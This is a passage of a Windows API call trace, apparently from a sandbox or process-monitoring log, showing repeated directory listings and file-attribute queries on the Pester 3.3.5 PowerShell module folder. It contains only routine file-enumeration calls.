nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0227.736] FindNextFileW (in: hFindFile=0x25b73cd1cb0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0227.736] FindNextFileW (in: hFindFile=0x25b73cd1cb0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0227.736] FindNextFileW (in: hFindFile=0x25b73cd1cb0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0227.737] FindNextFileW (in: hFindFile=0x25b73cd1cb0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0227.737] FindNextFileW (in: hFindFile=0x25b73cd1cb0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0227.737] FindNextFileW (in: hFindFile=0x25b73cd1cb0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0227.737] FindNextFileW (in: hFindFile=0x25b73cd1cb0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0227.737] FindNextFileW (in: hFindFile=0x25b73cd1cb0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0227.738] FindNextFileW (in: hFindFile=0x25b73cd1cb0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0227.738] FindNextFileW (in: hFindFile=0x25b73cd1cb0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0227.738] FindNextFileW (in: hFindFile=0x25b73cd1cb0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0227.738] FindNextFileW (in: hFindFile=0x25b73cd1cb0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0227.738] FindNextFileW (in: hFindFile=0x25b73cd1cb0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0227.739] FindNextFileW (in: hFindFile=0x25b73cd1cb0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0227.739] FindClose (in: hFindFile=0x25b73cd1cb0 | out: hFindFile=0x25b73cd1cb0) returned 1 [0227.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d180) returned 1 [0227.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d140) returned 1 [0227.739] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d250) returned 1 [0227.739] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x653ef8cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0227.739] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0x653ef8cf60 | out: lpFindFileData=0x653ef8cf60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2130 [0227.739] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.740] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0227.740] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0227.740] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0227.740] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0227.740] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0227.741] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0227.741] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0227.741] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0227.741] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0227.741] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0227.742] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0227.742] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0227.742] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0227.742] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0227.742] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 0 [0227.742] FindClose (in: hFindFile=0x25b73cd2130 | out: hFindFile=0x25b73cd2130) returned 1 [0227.743] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d180) returned 1 [0227.743] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d140) returned 1 [0227.743] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x653ef8ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0227.743] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d260) returned 1 [0227.743] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d340 | out: lpFileInformation=0x653ef8d340*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0227.743] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d220) returned 1 [0227.743] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d2b0) returned 1 [0227.743] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x653ef8cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0227.743] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0x653ef8cfc0 | out: lpFindFileData=0x653ef8cfc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2010 [0227.744] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.745] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0227.745] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0227.745] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0227.746] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0227.746] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0227.746] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0227.746] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0227.746] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0227.747] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, 